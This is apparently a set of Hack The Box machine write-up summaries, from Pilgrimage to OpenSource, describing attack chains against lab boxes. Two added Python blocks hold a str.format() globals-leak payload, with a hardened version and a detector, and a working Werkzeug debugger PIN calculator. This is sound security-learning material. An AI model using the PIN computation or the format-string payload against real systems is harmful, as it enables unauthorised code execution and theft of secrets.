Pilgrimage is an easy machine which starts with identifying the ImageMagick tool that the target web application uses to shrink images. The version in use is vulnerable to an arbitrary file read, which is used to fetch credentials from a database file. These credentials are used to SSH in and gain a user shell. The privilege escalation consists of exploiting Binwalk, which is invoked by a cron script running as root.
Topology is an easy machine which starts with exploiting LaTeX injection to read files on the server that contain password hashes. After cracking a hash, it was possible to log in via SSH and obtain the user flag. Privilege escalation consisted of enumerating the processes run by root. One of them executed “.plt” files from a folder to which the user had write permissions. Finally, it was a simple matter of looking up the documentation on running OS commands from that file type and using it to gain a shell as root.
Machine Name: Jupiter IP: 10.10.11.216 Difficulty: Medium
Summary
Jupiter is a medium machine that starts with discovering a subdomain that retrieves data from the database using queries sent through the request, making it vulnerable to SQLi. The SQL injection is leveraged to gain a shell as user postgres. A configuration script writable by postgres and run by juno is used to gain a shell as juno. Juno is part of the “science” group, which uses Jupyter Notebook. The Jupyter service is run by jovian. The Jupyter logs are readable by juno and are used to obtain tokens to log in to the Jupyter Hub. The notebook is used to execute commands and gain a shell as jovian. To escalate privileges to root, a binary which can be run using sudo reads a configuration file which is writable by jovian. This misconfiguration is leveraged to gain a shell as root.
Machine Name: Format IP: 10.10.11.213 Difficulty: Medium
Summary
Format is a medium machine that starts with discovering two ports that run Gitea and a Microblog respectively. First, an LFI is discovered on the Microblog after reviewing the source code. Further analysing the source code, one could bypass the mechanism to become a Pro user and upload image files. One of the parameters that causes the LFI creates a new file if one doesn’t already exist. This allowed writing a PHP shell, through which a shell was obtained as www-data. A Redis server listening on a Unix socket was discovered and used to obtain credentials for the user “cooper”. Privilege escalation involved exploiting a Python format string vulnerability in a script that could be run using sudo.
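To make the last step concrete, the following is an added example (not code from the box or from this write-up) of the Python format string vulnerability: an attacker-controlled template handed to `str.format()` can walk from any object to its method's `__globals__` and pull out module-level secrets. The `License` class, the `SECRET_KEY` value and the payload are constructed for the demonstration; the hardened variant uses `string.Template` with a fixed allow-list of plain-string fields, and a small parser check flags templates that traverse attributes or indexes.

```python
import string

# Constructed sample: a module-level secret that the vulnerable renderer leaks.
SECRET_KEY = "constructed-secret-key-0xdeadbeef"


class License:
    """Stand-in (constructed) for the object a sudo-run script hands to str.format()."""

    def __init__(self, owner: str):
        self.owner = owner


def render_vulnerable(template: str, lic: License) -> str:
    """Attacker-controlled template passed straight to str.format().

    str.format() resolves attribute ('.') and index ('[') lookups on the
    object, so '{license.__init__.__globals__[SECRET_KEY]}' walks from the
    bound method to the module's globals dict and returns SECRET_KEY.
    """
    return template.format(license=lic)


def template_has_traversal(template: str) -> bool:
    """Flag any replacement field that uses attribute or index access.

    string.Formatter().parse() yields (literal, field_name, spec, conversion);
    a field_name containing '.' or '[' is the gadget the attack relies on.
    """
    for _, field, _, _ in string.Formatter().parse(template):
        if field and ("." in field or "[" in field):
            return True
    return False


def render_hardened(template: str, lic: License) -> str:
    """Substitute only an allow-list of plain strings via string.Template.

    Template identifiers cannot contain '.' or '[', so '$owner' / '${owner}'
    are replaced and '${owner.__init__}' is left untouched by safe_substitute().
    """
    return string.Template(template).safe_substitute(owner=lic.owner)


if __name__ == "__main__":
    lic = License("cooper")
    payload = "{license.__init__.__globals__[SECRET_KEY]}"
    print("vulnerable:", render_vulnerable(payload, lic))
    print("flagged:   ", template_has_traversal(payload))
    print("hardened:  ", render_hardened("Licensed to $owner ${owner.__init__}", lic))
```

The traversal check is a useful grep-style gate for code review, but the real fix is never to pass untrusted input as the format string; treat it as data (`"{}".format(user_input)`) or use `string.Template` as above.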
Machine Name: Snoopy IP: 10.10.11.212 Difficulty: Hard
Summary
Snoopy is a hard machine that starts with discovering subdomains through a DNS zone transfer, and exploiting an LFI to obtain site configuration files that revealed the mail server’s DNS update secret key. The key was used to update the mail server’s DNS records so that mail was delivered to my local SMTP server. The mattermost subdomain that was discovered had an “email password reset link” page, and the reset for user cbrown was received on the SMTP server. The authenticated Mattermost session provided an option to interact with the server through SSH, which was intercepted with a man-in-the-middle attack to capture cbrown’s SSH credentials. The user cbrown could run the “git apply” command as user sbrown, which was exploited using a known vulnerability that follows symbolic links to write files as the user running Git. This was used to write an SSH public key into sbrown’s authorized keys and gain an SSH shell. Privilege escalation involved exploiting an XXE vulnerability in ClamAV to fetch root’s private key.
Machine Name: OnlyForYou IP: 10.10.11.210 Difficulty: Medium
Summary
OnlyForYou is a medium machine that starts with discovering a subdomain that is vulnerable to LFI. The LFI is used to read the source code of the application. Improper sanitization of user data in a part of the code that executes shell commands was leveraged to gain a shell as www-data. From this shell, two internal ports were found, one of which hosted a login page that accepted default credentials. The dashboard revealed that the application uses a Neo4j database, which prompted testing for Cypher injection (Cypher is Neo4j’s query language). The Cypher injection was successful and was used to extract password hashes from the database. The cracked hash was used to log in as user john. Privilege escalation involved abusing the “pip3 download” command, which the user could run as root.
Machine Name: Agile IP: 10.10.11.203 Difficulty: Medium
Summary
Agile is a medium machine that starts with discovering an LFI, which was leveraged to gather the information required to compute the Werkzeug debugger PIN. The PIN unlocked the debug console, which allowed us to gain a shell as www-data. A config file revealed MySQL database credentials, and from the database the credentials for user corum were found and used to SSH into the box. Enumerating further, it was found that Chrome was running with a remote debugging port at 41829; this port was forwarded to the attacker machine, which gave access to an existing logged-in session of the application. The credentials for user edwards were found there and used to SSH into the box. Privilege escalation to root involved exploiting sudo version 1.9.9 to modify a writable script that runs as root.
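The Werkzeug PIN is not cracked but recomputed: the debugger derives it from a handful of values an LFI can usually read off the box. The block below is an added example (not code from this write-up) re-implementing the derivation from Werkzeug’s `get_pin_and_cookie_name()` for Werkzeug 2.x, which hashes the bits with SHA-1 (older releases used MD5; adjust if the target runs one). The helper inputs are constructed samples: the MAC comes from `/sys/class/net/<iface>/address` and is used in decimal form, and the machine ID is `/etc/machine-id` (or `boot_id`) joined with the last path component of the first line of `/proc/self/cgroup`.

```python
import hashlib
from itertools import chain


def mac_to_decimal(mac: str) -> str:
    """'aa:bb:cc:dd:ee:ff' as read from /sys/class/net/<iface>/address -> str(uuid.getnode())."""
    return str(int(mac.replace(":", ""), 16))


def machine_id_from_files(machine_id_file: str, cgroup_first_line: str) -> str:
    """Mirror Werkzeug's get_machine_id() on Linux.

    It takes the first line of /etc/machine-id (falling back to
    /proc/sys/kernel/random/boot_id) and appends whatever follows the last '/'
    on the first line of /proc/self/cgroup (e.g. 'superpass.service').
    """
    value = machine_id_file.strip()
    cgroup_part = cgroup_first_line.strip().rpartition("/")[2]
    return value + cgroup_part


def werkzeug_pin(username: str, modname: str, appname: str, modfile: str,
                 mac_decimal: str, machine_id: str) -> tuple[str, str]:
    """Return (pin, cookie_name) the way werkzeug.debug.get_pin_and_cookie_name does.

    Public bits: the user running the app, the app's module name, the app
    object's __name__ (e.g. 'Flask') and the module's __file__.
    Private bits: the decimal MAC and the machine id.  Empty bits are skipped.
    """
    probably_public_bits = [username, modname, appname, modfile]
    private_bits = [mac_decimal, machine_id]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    # The PIN is the first nine digits of the same running hash plus 'pinsalt'.
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

    # Werkzeug groups the digits 5/4/3 at a time; nine digits gives XXX-XXX-XXX.
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


if __name__ == "__main__":
    # All values below are constructed samples, not the box's real ones.
    pin, cookie = werkzeug_pin(
        username="www-data",
        modname="flask.app",
        appname="Flask",
        modfile="/usr/lib/python3/dist-packages/flask/app.py",
        mac_decimal=mac_to_decimal("00:50:56:b9:1a:2b"),
        machine_id=machine_id_from_files("ed5b159560f54721827644bc9b220d00\n",
                                         "0::/system.slice/example.service\n"),
    )
    print(pin, cookie)
```

Two practical caveats: `modfile` must be the path of the module as Python sees it on the target (a `.pyc` versus `.py` difference or a venv path changes the hash), and the `/proc/self/cgroup` suffix is what most commonly breaks an otherwise correct computation, so read it through the same LFI rather than guessing.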
Inject is an easy machine which starts with exploiting an LFI to learn that the application is built on the Spring Framework. Through the LFI, we discover a configuration file which reveals that the Spring Cloud version in use is vulnerable to RCE. The Spring Cloud RCE is exploited to gain a shell as user frank. However, only user phil can read the user flag. Phil’s credentials were found in another configuration file and used to switch user to phil. Privilege escalation consisted of checking for cron jobs and looking for weaknesses in the jobs running as root. Ansible was being run on all the “.yml” files in a particular folder, which was exploited to gain access as root.
Trick is a moderately easy machine that demands a lot of enumeration skills. It involves finding two sub-domains that can be found through DNS zone transfer and sub-domain fuzzing. One of the sub-domains has a SQLi that can be leveraged to gather information on the server and the other sub-domain has a LFI that exposes SSH private key. This key is used to gain SSH access to the user. Since the user can restart fail2ban as root, one of fail2ban’s configuration files needed to be modified to gain a reverse shell as root.
OpenSource, like its name, is all about exploiting information that is openly available. It demands knowledge of LFI, Docker, Flask, reading source code and, of course, Git. To get a foothold, the LFI vulnerability was exploited to get RCE. Then, a Docker container needed to be escaped in order to gain the user shell. Knowledge of tunneling helps to connect to the host machine and enumerate further, which yields leaked credentials for a user on the host. Escalating privileges requires understanding Git hooks to exploit a process running as root. This box is great for someone who is new to programming and learning code/version management tools like Git.